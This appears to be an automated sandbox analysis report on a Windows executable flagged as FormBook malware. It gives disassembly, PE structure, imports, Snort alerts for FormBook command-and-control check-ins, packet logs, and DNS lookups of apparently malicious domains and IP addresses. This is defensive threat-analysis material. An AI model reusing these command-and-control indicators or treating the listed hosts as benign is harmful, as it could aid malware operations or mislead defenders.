                                                                push 0079E540h
                                                                call dword ptr [00407158h]
                                                                push 00409230h
                                                                push 007A2780h
                                                                call 00007F3604971EC8h
                                                                mov ebx, 007AA400h
                                                                push ebx
                                                                push 00000400h
                                                                call dword ptr [004070B4h]
                                                                call 00007F360496F609h
                                                                test eax, eax
                                                                jne 00007F360496F6C6h
                                                                push 000003FBh
                                                                push ebx
                                                                call dword ptr [004070B0h]
                                                                push 00409228h
                                                                push ebx
                                                                call 00007F3604971EB3h
                                                                call 00007F360496F5E9h
                                                                test eax, eax
                                                                je 00007F360496F7E2h
                                                                mov edi, 007A9000h
                                                                push edi
                                                                call dword ptr [00407140h]
                                                                call dword ptr [004070ACh]
                                                                push eax
                                                                push edi
                                                                call 00007F3604971E71h
                                                                push 00000000h
                                                                call dword ptr [00407108h]
                                                                cmp byte ptr [007A9000h], 00000022h
                                                                mov dword ptr [007A2F80h], eax
                                                                mov eax, edi
                                                                jne 00007F360496F6ACh
                                                                mov byte ptr [esp+10h], 00000022h
                                                                mov eax, 00000001h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                04/12/21-09:44:45.382473ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.417531ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                04/12/21-09:44:45.418858ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.454300ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                                04/12/21-09:44:45.456656ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.492495ICMP449ICMP Time-To-Live Exceeded in Transit130.117.49.165192.168.2.6
                                                                04/12/21-09:44:45.492950ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.533869ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.18192.168.2.6
                                                                04/12/21-09:44:45.534473ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.581049ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.53192.168.2.6
                                                                04/12/21-09:44:45.581555ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.627831ICMP449ICMP Time-To-Live Exceeded in Transit130.117.15.66192.168.2.6
                                                                04/12/21-09:44:45.628741ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.698393ICMP449ICMP Time-To-Live Exceeded in Transit195.22.208.117192.168.2.6
                                                                04/12/21-09:44:45.698731ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.754598ICMP449ICMP Time-To-Live Exceeded in Transit93.186.128.39192.168.2.6
                                                                04/12/21-09:44:45.779814ICMP384ICMP PING192.168.2.62.23.155.186
                                                                04/12/21-09:44:45.835206ICMP408ICMP Echo Reply2.23.155.186192.168.2.6
                                                                04/12/21-09:45:38.392312TCP1201ATTACK-RESPONSES 403 Forbidden804971923.227.38.74192.168.2.6
                                                                04/12/21-09:45:43.519484TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:45:43.519484TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:45:43.519484TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.6104.21.28.135
                                                                04/12/21-09:46:27.541057TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32
                                                                04/12/21-09:46:27.541057TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32
                                                                04/12/21-09:46:27.541057TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.614.129.120.32

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:45:38.186482906 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.227390051 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.229238987 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.229357958 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.270112991 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392312050 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392340899 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392357111 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392373085 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392389059 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392401934 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392417908 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392430067 CEST804971923.227.38.74192.168.2.6
                                                                Apr 12, 2021 09:45:38.392508030 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.392561913 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:38.392642021 CEST4971980192.168.2.623.227.38.74
                                                                Apr 12, 2021 09:45:43.478337049 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.519201994 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:43.519372940 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.519484043 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:43.560225964 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:44.022630930 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:44.063721895 CEST8049723104.21.28.135192.168.2.6
                                                                Apr 12, 2021 09:45:44.063839912 CEST4972380192.168.2.6104.21.28.135
                                                                Apr 12, 2021 09:45:49.197438002 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.271003008 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.271266937 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.271539927 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.344614983 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.773139000 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.777462006 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.777493000 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.777570963 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.778981924 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:49.845990896 CEST8049730176.104.107.18192.168.2.6
                                                                Apr 12, 2021 09:45:49.846148968 CEST4973080192.168.2.6176.104.107.18
                                                                Apr 12, 2021 09:45:54.990792990 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.128532887 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.128633976 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.128757954 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.265072107 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.265363932 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.265378952 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.265537024 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.265568972 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.402008057 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:46:00.427798033 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.476243973 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.476751089 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.477360964 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.527318954 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808547020 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808581114 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808593988 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808857918 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.808890104 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.811026096 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.811043978 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.811091900 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.811155081 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.857197046 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.857292891 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:11.315201044 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.506691933 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.506911039 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.507055998 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.699726105 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701028109 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701047897 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701212883 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.701270103 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.892635107 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:27.286428928 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.540777922 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:27.540909052 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.541057110 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.795403957 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.047282934 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.299175024 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.299216032 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.299283981 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.299313068 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.303107977 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.303395987 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:33.369340897 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:36.375056028 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:42.375618935 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:55.489099026 CEST4975580192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:58.502070904 CEST4975580192.168.2.652.79.124.173

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:44:40.411415100 CEST6204453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:44:40.471421957 CEST53620448.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:44:45.318442106 CEST6379153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:44:45.379901886 CEST53637918.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:02.403493881 CEST6426753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:02.452065945 CEST53642678.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:06.926908970 CEST4944853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:06.976300955 CEST53494488.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:07.975091934 CEST6034253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:08.028865099 CEST53603428.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:09.767848015 CEST6134653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:09.816939116 CEST53613468.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:10.665086031 CEST5177453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:10.713872910 CEST53517748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:13.507540941 CEST5602353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:13.556178093 CEST53560238.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:14.507272005 CEST5838453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:14.558725119 CEST53583848.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:15.601089954 CEST6026153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:15.652643919 CEST53602618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:16.397460938 CEST5606153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:16.447098970 CEST53560618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:16.693782091 CEST5833653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:16.744230032 CEST53583368.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:24.159548044 CEST5378153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:24.208345890 CEST53537818.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:26.310167074 CEST5406453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:26.374116898 CEST53540648.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:33.957351923 CEST5281153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:34.008945942 CEST53528118.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:38.098738909 CEST5529953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:38.181229115 CEST53552998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:38.245935917 CEST6374553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:38.294830084 CEST53637458.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:42.444972992 CEST5005553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:42.493585110 CEST53500558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:43.234297991 CEST6137453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:43.282898903 CEST53613748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:43.401276112 CEST5033953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:43.477227926 CEST53503398.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:44.023648024 CEST6330753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:44.072280884 CEST53633078.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:46.757334948 CEST4969453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:46.931324959 CEST53496948.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:47.535931110 CEST5498253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:47.638746977 CEST53549828.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.178205013 CEST5001053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.333719015 CEST6371853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.398461103 CEST53637188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.424993992 CEST53500108.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.852025986 CEST6211653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.912116051 CEST53621168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:49.049273968 CEST6381653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:49.195744038 CEST53638168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:49.485671043 CEST5501453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:49.547981024 CEST53550148.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:50.095978022 CEST6220853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:50.155900955 CEST53622088.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:50.676520109 CEST5757453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:50.733710051 CEST53575748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:51.402580976 CEST5181853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:51.526132107 CEST53518188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:52.361677885 CEST5662853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:52.425081015 CEST53566288.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:52.886096954 CEST6077853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:52.943603992 CEST53607788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:54.694713116 CEST5379953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:54.760945082 CEST53537998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:54.822232008 CEST5468353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:54.989849091 CEST53546838.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:00.279237032 CEST5932953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:00.426578045 CEST53593298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:01.417362928 CEST6402153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:01.468851089 CEST53640218.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:02.381097078 CEST5612953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:02.430174112 CEST53561298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:05.835242987 CEST5817753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:05.914354086 CEST53581778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:10.956753969 CEST5070053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:11.314012051 CEST53507008.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:16.721827984 CEST5406953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:16.811510086 CEST53540698.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:18.767153978 CEST6117853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:18.846771955 CEST53611788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:21.827483892 CEST5701753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:21.893973112 CEST53570178.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:25.161154985 CEST5632753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:25.211283922 CEST53563278.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:25.978316069 CEST5024353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:26.026947975 CEST53502438.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:26.930490971 CEST6205553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:27.285378933 CEST53620558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:27.477775097 CEST6124953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:27.551372051 CEST53612498.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:33.058473110 CEST6525253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:33.364765882 CEST53652528.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:55.098449945 CEST6436753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:55.480940104 CEST53643678.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 12, 2021 09:45:38.098738909 CEST192.168.2.68.8.8.80x18Standard query (0)www.cjaccessories.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.401276112 CEST192.168.2.68.8.8.80x601aStandard query (0)www.sportfest40.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.049273968 CEST192.168.2.68.8.8.80x76f7Standard query (0)www.kakavjesajt.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.822232008 CEST192.168.2.68.8.8.80x1dd4Standard query (0)www.cursosdigitaisbr.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:00.279237032 CEST192.168.2.68.8.8.80x1b8bStandard query (0)www.llmav.xyzA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:05.835242987 CEST192.168.2.68.8.8.80xb9ffStandard query (0)www.360caiyin.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:10.956753969 CEST192.168.2.68.8.8.80x2afcStandard query (0)www.35efb510815e.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:16.721827984 CEST192.168.2.68.8.8.80x13eeStandard query (0)www.nescleanups.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:21.827483892 CEST192.168.2.68.8.8.80xfeStandard query (0)www.stripepayment.onlineA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:26.930490971 CEST192.168.2.68.8.8.80xa915Standard query (0)www.beyoncos.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:33.058473110 CEST192.168.2.68.8.8.80x756Standard query (0)www.mg-izkerr8.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:55.098449945 CEST192.168.2.68.8.8.80x92afStandard query (0)www.mg-izkerr8.netA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 12, 2021 09:45:38.181229115 CEST8.8.8.8192.168.2.60x18No error (0)www.cjaccessories.netshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:38.181229115 CEST8.8.8.8192.168.2.60x18No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.477227926 CEST8.8.8.8192.168.2.60x601aNo error (0)www.sportfest40.com104.21.28.135A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.477227926 CEST8.8.8.8192.168.2.60x601aNo error (0)www.sportfest40.com172.67.170.213A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.195744038 CEST8.8.8.8192.168.2.60x76f7No error (0)www.kakavjesajt.comkakavjesajt.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.195744038 CEST8.8.8.8192.168.2.60x76f7No error (0)kakavjesajt.com176.104.107.18A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.989849091 CEST8.8.8.8192.168.2.60x1dd4No error (0)www.cursosdigitaisbr.comcursosdigitaisbr.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.989849091 CEST8.8.8.8192.168.2.60x1dd4No error (0)cursosdigitaisbr.com167.114.6.31A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:00.426578045 CEST8.8.8.8192.168.2.60x1b8bNo error (0)www.llmav.xyz35.244.230.236A (IP address)IN (0x0001)
